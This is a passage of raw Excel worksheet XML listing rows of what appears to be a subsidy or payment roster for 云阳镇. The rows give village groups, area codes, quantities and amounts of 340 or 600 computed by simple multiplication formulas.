        <v>3850</v>
      </c>
      <c r="E1427" s="14" t="s">
        <v>3841</v>
      </c>
      <c r="F1427" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1427" s="14">
        <v>1</v>
      </c>
      <c r="H1427" s="14">
        <v>340</v>
      </c>
      <c r="I1427" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1427" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1427" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1428" ht="23" customHeight="1" spans="1:11">
      <c r="A1428" s="13" t="s">
        <v>3851</v>
      </c>
      <c r="B1428" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1428" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1428" s="14" t="s">
        <v>3852</v>
      </c>
      <c r="E1428" s="14" t="s">
        <v>3853</v>
      </c>
      <c r="F1428" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1428" s="14">
        <v>1</v>
      </c>
      <c r="H1428" s="14">
        <v>340</v>
      </c>
      <c r="I1428" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1428" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1428" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1429" ht="23" customHeight="1" spans="1:11">
      <c r="A1429" s="13" t="s">
        <v>3854</v>
      </c>
      <c r="B1429" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1429" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1429" s="14" t="s">
        <v>3855</v>
      </c>
      <c r="E1429" s="14" t="s">
        <v>3716</v>
      </c>
      <c r="F1429" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1429" s="14">
        <v>1</v>
      </c>
      <c r="H1429" s="14">
        <v>340</v>
      </c>
      <c r="I1429" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1429" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1429" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1430" ht="23" customHeight="1" spans="1:11">
      <c r="A1430" s="13" t="s">
        <v>3856</v>
      </c>
      <c r="B1430" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1430" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1430" s="14" t="s">
        <v>3858</v>
      </c>
      <c r="E1430" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1430" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1430" s="14">
        <v>1</v>
      </c>
      <c r="H1430" s="14">
        <v>340</v>
      </c>
      <c r="I1430" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1430" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1430" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1431" ht="23" customHeight="1" spans="1:11">
      <c r="A1431" s="13" t="s">
        <v>3859</v>
      </c>
      <c r="B1431" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1431" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1431" s="14" t="s">
        <v>3860</v>
      </c>
      <c r="E1431" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1431" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1431" s="14">
        <v>1</v>
      </c>
      <c r="H1431" s="14">
        <v>340</v>
      </c>
      <c r="I1431" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1431" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1431" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1432" ht="23" customHeight="1" spans="1:11">
      <c r="A1432" s="13" t="s">
        <v>3861</v>
      </c>
      <c r="B1432" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1432" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1432" s="14" t="s">
        <v>3862</v>
      </c>
      <c r="E1432" s="14" t="s">
        <v>3863</v>
      </c>
      <c r="F1432" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1432" s="14">
        <v>1</v>
      </c>
      <c r="H1432" s="14">
        <v>340</v>
      </c>
      <c r="I1432" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1432" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1432" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1433" ht="23" customHeight="1" spans="1:11">
      <c r="A1433" s="13" t="s">
        <v>3864</v>
      </c>
      <c r="B1433" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1433" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1433" s="14" t="s">
        <v>3865</v>
      </c>
      <c r="E1433" s="14" t="s">
        <v>3866</v>
      </c>
      <c r="F1433" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1433" s="14">
        <v>1</v>
      </c>
      <c r="H1433" s="14">
        <v>340</v>
      </c>
      <c r="I1433" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1433" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1433" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1434" ht="23" customHeight="1" spans="1:11">
      <c r="A1434" s="13" t="s">
        <v>3867</v>
      </c>
      <c r="B1434" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1434" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1434" s="14" t="s">
        <v>3868</v>
      </c>
      <c r="E1434" s="14" t="s">
        <v>3869</v>
      </c>
      <c r="F1434" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1434" s="14">
        <v>1</v>
      </c>
      <c r="H1434" s="14">
        <v>340</v>
      </c>
      <c r="I1434" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1434" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1434" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1435" ht="23" customHeight="1" spans="1:11">
      <c r="A1435" s="13" t="s">
        <v>3870</v>
      </c>
      <c r="B1435" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1435" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1435" s="14" t="s">
        <v>3871</v>
      </c>
      <c r="E1435" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1435" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1435" s="14">
        <v>1</v>
      </c>
      <c r="H1435" s="14">
        <v>340</v>
      </c>
      <c r="I1435" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1435" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1435" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1436" ht="23" customHeight="1" spans="1:11">
      <c r="A1436" s="13" t="s">
        <v>3872</v>
      </c>
      <c r="B1436" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1436" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1436" s="14" t="s">
        <v>3873</v>
      </c>
      <c r="E1436" s="14" t="s">
        <v>3874</v>
      </c>
      <c r="F1436" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1436" s="14">
        <v>1</v>
      </c>
      <c r="H1436" s="14">
        <v>340</v>
      </c>
      <c r="I1436" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1436" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1436" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1437" ht="23" customHeight="1" spans="1:11">
      <c r="A1437" s="13" t="s">
        <v>3875</v>
      </c>
      <c r="B1437" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1437" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1437" s="14" t="s">
        <v>3876</v>
      </c>
      <c r="E1437" s="14" t="s">
        <v>3736</v>
      </c>
      <c r="F1437" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1437" s="14">
        <v>1</v>
      </c>
      <c r="H1437" s="14">
        <v>340</v>
      </c>
      <c r="I1437" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1437" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1437" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1438" ht="23" customHeight="1" spans="1:11">
      <c r="A1438" s="13" t="s">
        <v>3877</v>
      </c>
      <c r="B1438" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1438" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1438" s="14" t="s">
        <v>3878</v>
      </c>
      <c r="E1438" s="14" t="s">
        <v>3879</v>
      </c>
      <c r="F1438" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1438" s="14">
        <v>1</v>
      </c>
      <c r="H1438" s="14">
        <v>340</v>
      </c>
      <c r="I1438" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1438" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1438" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1439" ht="23" customHeight="1" spans="1:11">
      <c r="A1439" s="13" t="s">
        <v>3880</v>
      </c>
      <c r="B1439" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1439" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1439" s="14" t="s">
        <v>3881</v>
      </c>
      <c r="E1439" s="14" t="s">
        <v>3866</v>
      </c>
      <c r="F1439" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1439" s="14">
        <v>2</v>
      </c>
      <c r="H1439" s="14">
        <v>300</v>
      </c>
      <c r="I1439" s="14">
        <f t="shared" si="71"/>
        <v>600</v>
      </c>
      <c r="J1439" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1439" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1440" ht="23" customHeight="1" spans="1:11">
      <c r="A1440" s="13" t="s">
        <v>3882</v>
      </c>
      <c r="B1440" s="14" t="str">
        <f>B1439</f>
        <v>云阳镇</v>
      </c>
      <c r="C1440" s="14" t="str">
        <f>C1439</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1440" s="13" t="s">
        <v>3883</v>
      </c>
      <c r="E1440" s="13" t="s">
        <v>3769</v>
      </c>
      <c r="F1440" s="14" t="str">
        <f>F1439</f>
        <v>4113210519</v>
      </c>
      <c r="G1440" s="14"/>
      <c r="H1440" s="14"/>
      <c r="I1440" s="14"/>
      <c r="J1440" s="14"/>
      <c r="K1440" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1441" ht="23" customHeight="1" spans="1:11">
      <c r="A1441" s="13" t="s">
        <v>3884</v>
      </c>
      <c r="B1441" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1441" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1441" s="14" t="s">
        <v>3885</v>
      </c>
      <c r="E1441" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1441" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1441" s="14">
        <v>1</v>
      </c>
      <c r="H1441" s="14">
        <v>340</v>
      </c>
      <c r="I1441" s="14">
        <f t="shared" ref="I1441:I1446" si="72">H1441*G1441</f>
        <v>340</v>
      </c>
      <c r="J1441" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1441" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1442" ht="23" customHeight="1" spans="1:11">
      <c r="A1442" s="13" t="s">
        <v>3886</v>
      </c>
      <c r="B1442" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1442" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1442" s="14" t="s">
        <v>3887</v>
      </c>
      <c r="E1442" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1442" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1442" s="14">
        <v>1</v>
      </c>
      <c r="H1442" s="14">
        <v>340</v>
      </c>
      <c r="I1442" s="14">
        <f t="shared" si="72"/>
        <v>340</v>
      </c>
      <c r="J1442" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1442" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1443" ht="23" customHeight="1" spans="1:11">
      <c r="A1443" s="13" t="s">
        <v>3889</v>
      </c>
      <c r="B1443" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1443" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1443" s="14" t="s">
        <v>3890</v>
      </c>
      <c r="E1443" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1443" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1443" s="14">
        <v>1</v>
      </c>
      <c r="H1443" s="14">
        <v>340</v>
      </c>
      <c r="I1443" s="14">
        <f t="shared" si="72"/>
        <v>340</v>
      </c>
      <c r="J1443" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1443" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1444" ht="23" customHeight="1" spans="1:11">
      <c r="A1444" s="13" t="s">
        <v>3891</v>
      </c>
      <c r="B1444" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1444" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1444" s="14" t="s">
        <v>3892</v>
      </c>
      <c r="E1444" s="14" t="s">
        <v>428</v>
      </c>
      <c r="F1444" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1444" s="14">
        <v>1</v>
      </c>
      <c r="H1444" s="14">
        <v>340</v>
      </c>
      <c r="I1444" s="14">
        <f t="shared" si="72"/>
        <v>340</v>
      </c>
      <c r="J1444" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1444" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1445" ht="23" customHeight="1" spans="1:11">
      <c r="A1445" s="13" t="s">
        <v>3893</v>
      </c>
      <c r="B1445" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1445" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1445" s="14" t="s">
        <v>3894</v>
      </c>
      <c r="E1445" s="14" t="s">
        <v>3869</v>
      </c>
      <c r="F1445" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1445" s="14">
        <v>1</v>
      </c>
      <c r="H1445" s="14">
        <v>340</v>
      </c>
      <c r="I1445" s="14">
        <f t="shared" si="72"/>
        <v>340</v>
      </c>
      <c r="J1445" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1445" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1446" ht="23" customHeight="1" spans="1:11">
      <c r="A1446" s="13" t="s">
        <v>3895</v>
      </c>
      <c r="B1446" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1446" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1446" s="14" t="s">
        <v>3896</v>
      </c>
      <c r="E1446" s="14" t="s">
        <v>3897</v>
      </c>
      <c r="F1446" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1446" s="14">
        <v>2</v>
      </c>
      <c r="H1446" s="14">
        <v>300</v>
      </c>
      <c r="I1446" s="14">
        <f t="shared" si="72"/>
        <v>600</v>
      </c>
      <c r="J1446" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1446" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1447" ht="23" customHeight="1" spans="1:11">
      <c r="A1447" s="13" t="s">
        <v>3898</v>
      </c>
      <c r="B1447" s="14" t="str">
        <f>B1446</f>
        <v>云阳镇</v>
      </c>
      <c r="C1447" s="14" t="str">
        <f>C1446</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1447" s="13" t="s">
        <v>3899</v>
      </c>
      <c r="E1447" s="13" t="s">
        <v>1442</v>
      </c>
      <c r="F1447" s="14" t="str">
        <f>F1446</f>
        <v>4113210519</v>
      </c>
      <c r="G1447" s="14"/>
      <c r="H1447" s="14"/>
      <c r="I1447" s="14"/>
      <c r="J1447" s="14"/>
      <c r="K1447" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1448" ht="23" customHeight="1" spans="1:11">
      <c r="A1448" s="13" t="s">
        <v>3900</v>
      </c>
      <c r="B1448" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1448" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1448" s="14" t="s">
        <v>3901</v>
      </c>
      <c r="E1448" s="14" t="s">
        <v>3776</v>
      </c>
      <c r="F1448" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1448" s="14">
        <v>1</v>
      </c>
      <c r="H1448" s="14">
        <v>340</v>
      </c>
      <c r="I1448" s="14">
        <f>H1448*G1448</f>
        <v>340</v>
      </c>
      <c r="J1448" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1448" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1449" ht="23" customHeight="1" spans="1:11">
      <c r="A1449" s="13" t="s">
        <v>3902</v>
      </c>
      <c r="B1449" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1449" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1449" s="14" t="s">
        <v>3903</v>
      </c>
      <c r="E1449" s="14" t="s">
        <v>3904</v>
      </c>
      <c r="F1449" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1449" s="14">
        <v>1</v>
      </c>
      <c r="H1449" s="14">
        <v>340</v>
      </c>
      <c r="I1449" s="14">
        <f>H1449*G1449</f>
        <v>340</v>
      </c>
      <c r="J1449" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1449" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1450" ht="23" customHeight="1" spans="1:11">
      <c r="A1450" s="13" t="s">
        <v>3905</v>
      </c>
      <c r="B1450" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1450" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1450" s="14" t="s">
        <v>3906</v>
      </c>
      <c r="E1450" s="14" t="s">
        <v>3907</v>
      </c>
      <c r="F1450" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1450" s="14">
        <v>1</v>
      </c>
      <c r="H1450" s="14">
        <v>340</v>
      </c>
      <c r="I1450" s="14">
        <f>H1450*G1450</f>
        <v>340</v>
      </c>
      <c r="J1450" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1450" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1451" ht="23" customHeight="1" spans="1:11">
      <c r="A1451" s="13" t="s">
        <v>3908</v>
      </c>
      <c r="B1451" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1451" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1451" s="14" t="s">
        <v>3909</v>
      </c>
      <c r="E1451" s="14" t="s">
        <v>3794</v>
      </c>
      <c r="F1451" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1451" s="14">
        <v>1</v>
      </c>
      <c r="H1451" s="14">
        <v>340</v>
      </c>
      <c r="I1451" s="14">
        <f>H1451*G1451</f>
        <v>340</v>
      </c>
      <c r="J1451" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1451" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1452" ht="23" customHeight="1" spans="1:11">
      <c r="A1452" s="13" t="s">
        <v>3910</v>
      </c>
      <c r="B1452" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1452" s="14" t="s">
        <v>3911</v>
      </c>
      <c r="D1452" s="14" t="s">
        <v>3912</v>
      </c>
      <c r="E1452" s="14" t="s">
        <v>3913</v>
      </c>
      <c r="F1452" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1452" s="14">
        <v>2</v>
      </c>
      <c r="H1452" s="14">
        <v>300</v>
      </c>
      <c r="I1452" s="14">
        <f>H1452*G1452</f>
        <v>600</v>
      </c>
      <c r="J1452" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1452" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1453" ht="23" customHeight="1" spans="1:11">
      <c r="A1453" s="13" t="s">
        <v>3914</v>
      </c>
      <c r="B1453" s="14" t="str">
        <f>B1452</f>
        <v>云阳镇</v>
      </c>
      <c r="C1453" s="14" t="str">
        <f>C1452</f>
        <v>小关三组</v>
      </c>
      <c r="D1453" s="13" t="s">
        <v>3915</v>
      </c>
      <c r="E1453" s="13" t="s">
        <v>3916</v>
      </c>
      <c r="F1453" s="14" t="str">
        <f>F1452</f>
        <v>4113210521</v>
      </c>
      <c r="G1453" s="14"/>
      <c r="H1453" s="14"/>
      <c r="I1453" s="14"/>
      <c r="J1453" s="14"/>
      <c r="K1453" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1454" ht="23" customHeight="1" spans="1:11">
      <c r="A1454" s="13" t="s">
        <v>3917</v>
      </c>
      <c r="B1454" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1454" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1454" s="14" t="s">
        <v>3918</v>
      </c>
      <c r="E1454" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1454" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1454" s="14">
        <v>1</v>
      </c>
      <c r="H1454" s="14">
        <v>340</v>
      </c>
      <c r="I1454" s="14">
        <f t="shared" ref="I1454:I1478" si="73">H1454*G1454</f>
        <v>340</v>
      </c>
      <c r="J1454" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1454" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1455" ht="23" customHeight="1" spans="1:11">
      <c r="A1455" s="13" t="s">
        <v>3919</v>
      </c>
      <c r="B1455" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1455" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1455" s="14" t="s">
        <v>3920</v>
      </c>
      <c r="E1455" s="14" t="s">
        <v>3713</v>
      </c>
      <c r="F1455" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1455" s="14">
        <v>1</v>
      </c>
      <c r="H1455" s="14">
        <v>340</v>
      </c>
      <c r="I1455" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1455" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1455" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1456" ht="23" customHeight="1" spans="1:11">
      <c r="A1456" s="13" t="s">
        <v>3921</v>
      </c>
      <c r="B1456" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1456" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1456" s="14" t="s">
        <v>3922</v>
      </c>
      <c r="E1456" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1456" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1456" s="14">
        <v>1</v>
      </c>
      <c r="H1456" s="14">
        <v>340</v>
      </c>
      <c r="I1456" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1456" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1456" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1457" ht="23" customHeight="1" spans="1:11">
      <c r="A1457" s="13" t="s">
        <v>3924</v>
      </c>
      <c r="B1457" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1457" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1457" s="14" t="s">
        <v>3925</v>
      </c>
      <c r="E1457" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1457" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1457" s="14">
        <v>1</v>
      </c>
      <c r="H1457" s="14">
        <v>340</v>
      </c>
      <c r="I1457" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1457" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1457" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1458" ht="23" customHeight="1" spans="1:11">
      <c r="A1458" s="13" t="s">
        <v>3926</v>
      </c>
      <c r="B1458" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1458" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1458" s="14" t="s">
        <v>3927</v>
      </c>
      <c r="E1458" s="14" t="s">
        <v>3716</v>
      </c>
      <c r="F1458" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1458" s="14">
        <v>1</v>
      </c>
      <c r="H1458" s="14">
        <v>340</v>
      </c>
      <c r="I1458" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1458" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1458" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1459" ht="23" customHeight="1" spans="1:11">
      <c r="A1459" s="13" t="s">
        <v>3928</v>
      </c>
      <c r="B1459" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1459" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1459" s="14" t="s">
        <v>3929</v>
      </c>
      <c r="E1459" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1459" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1459" s="14">
        <v>1</v>
      </c>
      <c r="H1459" s="14">
        <v>340</v>
      </c>
      <c r="I1459" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1459" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1459" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1460" ht="23" customHeight="1" spans="1:11">
      <c r="A1460" s="13" t="s">
        <v>3930</v>
      </c>
      <c r="B1460" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1460" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1460" s="14" t="s">
        <v>3931</v>
      </c>
      <c r="E1460" s="14" t="s">
        <v>3766</v>
      </c>
      <c r="F1460" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1460" s="14">
        <v>1</v>
      </c>
      <c r="H1460" s="14">
        <v>340</v>
      </c>
      <c r="I1460" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1460" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1460" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1461" ht="23" customHeight="1" spans="1:11">
      <c r="A1461" s="13" t="s">
        <v>3932</v>
      </c>
      <c r="B1461" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1461" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1461" s="14" t="s">
        <v>3933</v>
      </c>
      <c r="E1461" s="14" t="s">
        <v>3916</v>
      </c>
      <c r="F1461" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1461" s="14">
        <v>1</v>
      </c>
      <c r="H1461" s="14">
        <v>340</v>
      </c>
      <c r="I1461" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1461" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1461" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1462" ht="23" customHeight="1" spans="1:11">
      <c r="A1462" s="13" t="s">
        <v>3934</v>
      </c>
      <c r="B1462" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1462" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1462" s="14" t="s">
        <v>3935</v>
      </c>
      <c r="E1462" s="14" t="s">
        <v>3936</v>
      </c>
      <c r="F1462" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1462" s="14">
        <v>1</v>
      </c>
      <c r="H1462" s="14">
        <v>340</v>
      </c>
      <c r="I1462" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1462" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1462" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1463" ht="23" customHeight="1" spans="1:11">
      <c r="A1463" s="13" t="s">
        <v>3937</v>
      </c>
      <c r="B1463" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1463" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1463" s="14" t="s">
        <v>3939</v>
      </c>
      <c r="E1463" s="14" t="s">
        <v>2618</v>
      </c>
      <c r="F1463" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1463" s="14">
        <v>1</v>
      </c>
      <c r="H1463" s="14">
        <v>340</v>
      </c>
      <c r="I1463" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1463" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1463" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1464" ht="23" customHeight="1" spans="1:11">
      <c r="A1464" s="13" t="s">
        <v>3940</v>
      </c>
      <c r="B1464" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1464" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1464" s="14" t="s">
        <v>3941</v>
      </c>
      <c r="E1464" s="14" t="s">
        <v>3942</v>
      </c>
      <c r="F1464" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1464" s="14">
        <v>1</v>
      </c>
      <c r="H1464" s="14">
        <v>340</v>
      </c>
      <c r="I1464" s="14">
        <f t="shared" si="73"/>
        <v>340</v>
      </c>
      <c r="J1464" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1464" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1465" ht="23" customHeight="1" spans="1:11">
      <c r="A1465" s="13" t="s">
        <v>3943</v>
      </c>
      <c r="B1465" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1465" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1465" s="14" t="s">
        <v>3944</v>
      </c>
      <c r="E1465" s="14" t="s">
        <v>3945</v>
      </c>
      <c r="F1465" s="14" t="s">
